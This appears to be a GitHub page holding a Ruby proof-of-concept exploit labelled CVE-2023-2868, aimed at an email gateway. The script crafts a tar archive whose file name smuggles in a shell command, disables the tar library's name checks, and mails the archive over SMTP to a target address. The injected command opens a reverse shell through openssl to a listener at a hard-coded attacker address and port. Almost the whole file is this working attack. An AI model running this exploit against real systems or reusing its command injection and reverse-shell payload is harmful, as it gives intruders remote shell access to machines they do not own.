-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathpoc_cve_2023_2868.rb
89 lines (76 loc) · 2.46 KB
/
poc_cve_2023_2868.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
require 'base64'
require 'mail'
require 'net/smtp'
require 'rubygems/package'
RHOST = "#{ARGV[0] || '192.168.1.42'}"
LHOST = "192.168.1.10"
LPORT = "9001"
TARGET_EMAIL = "[email protected]"
CMD = "setsid sh -c \"mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect #{LHOST}:#{LPORT} >/tmp/p 2>/dev/null;rm /tmp/p\""
PAYLOAD = "'`#{CMD}`'"
class Gem::Package::TarWriter
=begin
Override split_name to eliminate filename size checks. Prefix names
andfile names are validated in the original code and we want to get
rid of that because we're making sketchy tarfiles here.
https://github.com/ruby/ruby/blob/master/lib/rubygems/package/tar_writer.rb
=end
def split_name(name)
prefix = ""
if name.bytesize > 100
parts = name.split("/", -1) # parts are never empty here
name = parts.pop # initially empty for names with a trailing slash ("foo/.../bar/")
prefix = parts.join("/") # if empty, then it's impossible to split (parts is empty too)
while !parts.empty? && (prefix.bytesize > 155 || name.empty?)
name = parts.pop + "/" + name
prefix = parts.join("/")
end
end
[name, prefix]
end
end
def rand_str(number)
charset = Array('A'..'Z') + Array('a'..'z')
Array.new(number) { charset.sample }.join
end
def tar(files_and_contents, output_file)
puts "[+] Creating tar file: #{output_file}"
File.open(output_file, "wb") do |file|
Gem::Package::TarWriter.new(file) do |tar|
files_and_contents.each_pair do |filename, content|
tar.add_file_simple(filename, 0644, content.length) do |io|
io.write(content)
end
end
end
end
end
def cleanup(filename)
puts "[+] cleaning up"
File.delete(filename) if File.exists?(filename)
end
def sendmail(addr, target_email, attachment)
src_addr = rand_str(8)
Mail.defaults do
delivery_method :smtp, {
:address => addr,
:port => 25,
:openssl_verify_mode => 'none'
}
end
puts "[+] sending mail"
Mail.deliver do
from "#{src_addr}@lol.tst"
to target_email # "[email protected]"
subject "Email with attachment - #{src_addr}"
body "Hello world"
add_file attachment
end
end
files = {
PAYLOAD => rand_str(32),
}
OUTFILE = rand_str(8) + '.tar'
tar(files, OUTFILE)
sendmail(RHOST, TARGET_EMAIL, OUTFILE)
cleanup(OUTFILE)